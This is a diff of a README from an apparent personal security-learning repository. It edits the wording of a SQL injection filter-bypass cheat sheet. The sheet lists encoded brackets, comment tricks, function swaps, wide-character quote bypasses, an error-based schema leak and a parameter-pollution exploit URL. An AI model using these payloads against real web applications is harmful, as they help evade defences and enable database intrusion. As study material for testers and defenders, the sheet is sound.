shinmao/SecurityLearning/SQL-inj/README.md

   - `unicode(left bracket): %u0028 %uff08 %c0%28 %c0%a8 %e0%80%a8`
   - `unicode(right bracket): %u0029 %uff09 %c0%29 %c0%a9 %e0%80%a9`
   - `Char(49)` `Hex('a')` `Unhex(61)`
-  - On asp+iis, server can parse unicode automatically, `%` in url would be ignored, it means `s%u0065lect` would be parsed as select
+  - On asp+iis, server can parse the unicode automatically, `%` in url would be ignored, it means `s%u0065lect` would be parsed as 'select'
   - `IBM037`,`IBM500`,`IBM1026`,`cp875` and so on, take a look at [bypass waf with encoding](#bypass-requestvalidation-on-aspx)
 - Comment
   - `#`
   - `--+` `--` `-- -`
   - `/* ... */` `///**/`(multiple lines)
   - {backtick} can be used as comment if  mysql <= 5.5
-  - `;` stacking queries cannot be used in mysql query+php, but works in PDO
+  - `;` stacking queries cannot be used in mysql query+php, but it works in PDO
 - Command bypass
   - `sleep()` -> `benchmark()`
   - `@@datadir` -> `datadir()`
 - Logic operator
   - `and/or` -> `&& / |`
-- Wide char
+- Wide-Character injection
   - bypass single quote： `%bf%27 %df%27 %aa%27`
-- `information_schema` bypass
+- keyword `information_schema` bypass
   - get database name：`select * from users where name = helloworld();`
     `ERROR 1305 (42000): FUNCTION CODINGGROUND.helloworld does not exist`
 - HPP on asp
-  - When GET/POST/COOKIE submit `uid` at the same time, server would follow GET/POST/COOKIE to receive and split them with comma
+  - When GET/POST/COOKIE submit `uid` at the same time, server would follow the order of GET/POST/COOKIE to receive and split them with comma
   - Exploit: `http://example.com/?uid=1 and 1=2 union/*  POST: uid=*/select.....`
 - Function separator
-  - In fact, there can be someting between func name and left bracket, this can be used to bypass regex
+  - In fact, there can be something between function name and the left bracket, this can be used to bypass regex
   - function `/**/`,`%2520`,`%250c`,`%25a0` ()

 More：